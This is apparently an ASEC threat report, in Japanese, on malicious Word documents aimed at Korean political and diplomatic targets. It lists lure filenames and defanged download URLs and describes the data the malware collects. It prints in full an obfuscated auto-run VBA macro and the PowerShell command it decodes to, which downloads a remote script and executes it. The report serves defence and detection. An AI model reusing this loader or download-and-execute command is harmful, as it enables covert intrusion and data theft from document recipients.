ASEC 分析チームは、以前に”「韓国政治外交学術」および「政策諮問委員略歴」の不正な Word ドキュメントの拡散“などで紹介したような不正な Word ドキュメントと同じタイプのマルウェアが、現在も拡散していることを確認した。最近確認された Word ファイルも、従来と同じく External リンクを通じて不正なマクロが含まれた dotm ファイルをダウンロードする。確認されたファイル名と External アドレスは以下の通りである。
| 発見日 | ファイル名 | External URL |
| 7/3 | [남북회담본부 정책자문위원] 약력 작성 양식.docx (翻訳:[南北会談本部 製作諮問委員]略歴作成様式.docx) | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| 7/6 | 00225 한미의원대화 ***.docx (翻訳:00225 米韓議員対話 ***.docx) | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/9 | *** 교수님 BIO.docx (翻訳:***教授 BIO.docx) | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/12 | *** 교수-BIO.docx (翻訳:***教授-BIO.docx) | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/15 | BIO 양식.docx ( 翻訳:BIO 様式.docx) | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |
ダウンロードされたすべての dotm ファイルは、既に確認されているタイプのマクロと同じものが含まれている。以下は BIO 様式.docx の External リンク(hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm)からダウンロードされた dotm ファイルに存在していた不正なマクロである。
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
ndkflajdkfjskdjfl = "tlsiaNtlsiaetlsiattlsia.tlsiaWtlsiaetlsiabtlsiaCtlsialtlsiaitlsiaetlsiantlsiattlsia)tlsia.tlsiaDotlsiantlsiagtlsia"
ndkflajdkfjskdjfl = Replace(ndkflajdkfjskdjfl, fjdjkasf, "")
salfnxkfdlsjafkj = "('htlsiattlsiattlsiaptlsia:tlsia/tlsia/tlsiattlsiabtlsiaetlsiaatlsiartlsia.tlsiamtlsiaytlsiaptlsiartlsiaetlsiastlsiastlsiaotlsiantlsialtlsiaitlsiantlsiaetlsia.tlsiactlsiaotlsiamtlsia/tlsiactlsiaitlsia/tlsiamotlsia.tlsiattlsiaxtlsiat')"
salfnxkfdlsjafkj = Replace(salfnxkfdlsjafkj, fjdjkasf, "")
sjdfkjaslalsfial = "tlsia}tlsia;tlsia$tlsiabtlsia=tlsia$tlsiaatlsia.tlsiaitlsiantlsiastlsiaetlsiartlsiattlsia(tlsia2tlsia9tlsia,tlsia'"
sjdfkjaslalsfial = Replace(sjdfkjaslalsfial, fjdjkasf, "")
aksfkjaskjfksnkf = "tlsiatlsiawtlsiantlsialtlsiaotlsiaatlsiadtlsiastlsiattlsiartlsiaitlsia'tlsia)tlsia;tlsia$tlsiactlsia=tlsiaitlsia"
aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
sdfewjdhsajkfhjdf = "etlsiaxtlsia tlsia$tlsiabtlsia;tlsiaitlsiaetlsiaxtlsia tlsia$tlsiactlsia"
sdfewjdhsajkfhjdf = Replace(sdfewjdhsajkfhjdf, fjdjkasf, "")
skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf + sdfewjdhsajkfhjdf
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
End Function[コード-1] BIO.dotm ファイルに存在しているマクロコード
マクロを実行すると、以下の PowerShell コマンドが実行され、hxxp://tbear.mypressonline.com/ci/mo.txt に存在するスクリプトをダウンロードおよび実行する。
| “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” [string]$a={(New-Object Net.WebClient).Dong(‘hxxp://tbear.mypressonline.com/ci/mo.txt’)};$b=$a.insert(29,’wnloadstri’);$c=iex $b;iex $c |
この不正なスクリプトは、C2 アドレス以外が以前に記事で説明したものと同じであり、以下のようにユーザー情報の収集および追加ファイルのダウンロードなどの行為を実行する。
- 追加の不正なファイルのダウンロード
- 最近の実行ファイルリストの収集
- SystemInfo 収集
- tasklist 収集
- 収集したファイルのアップロード
追加で、上記のような不正な dotm をダウンロードする URL と不正なスクリプトが存在する URL が多数確認された。
| hxxp://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm hxxp://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm hxxp://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm hxxp://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| hxxp://stair.myartsonline.com/ya/ng.txt hxxp://lovels.myartsonline.com/ys/ha.txt hxxp://lovel.myartsonline.com/le/ej.txt hxxp://visul.myartsonline.com/yk/yo.txt hxxp://vbqwer.mypressonline.com/test.log hxxp://tbear.mypressonline.com/test.txt hxxp://obser.mygamesonline.org/nw.txt hxxp://modri.myartsonline.com/gu/nw.txt hxxp://warcr.onlinewebshop.net/le/eh.txt hxxp://stair.atwebpages.com/ne/la.txt hxxp://giruz.atwebpages.com/sw/cu.txt hxxp://benze.atwebpages.com/ki/mc.txt hxxp://likel.atwebpages.com/bu/ma.txt hxxp://rster.atwebpages.com/an/ce.txt hxxp://mantc.getenjoyment.net/ya/ng.txt |
正常な Word ドキュメントに偽装したターゲット型マルウェアが拡散し続けており、ユーザーは特に注意が必要である。出どころが不明なファイルの閲覧や、ドキュメントファイルのマクロは、実行しないようにしなければならない。また、当該マルウェアはマクロのセキュリティ設定を変更する機能を実行するため、ユーザーはセキュリティ設定のレベルが高く維持されているかを定期的に確認する必要がある。
V3 では、上記で紹介したファイルに対して以下のように検知している。
[ファイル検知]
Categories:マルウェアの情報
[…] 以前「Word ドキュメントを利用した特定の対象に対する APT 攻撃の試み」の記事で確認されたマクロコードよりもやや難読化されている。マクロを実行すると、PowerShell を通じて「hxxp://vjdif.mypressonline[.]com/ho/ng.txt」からさらなるスクリプトをダウンロードする。 […]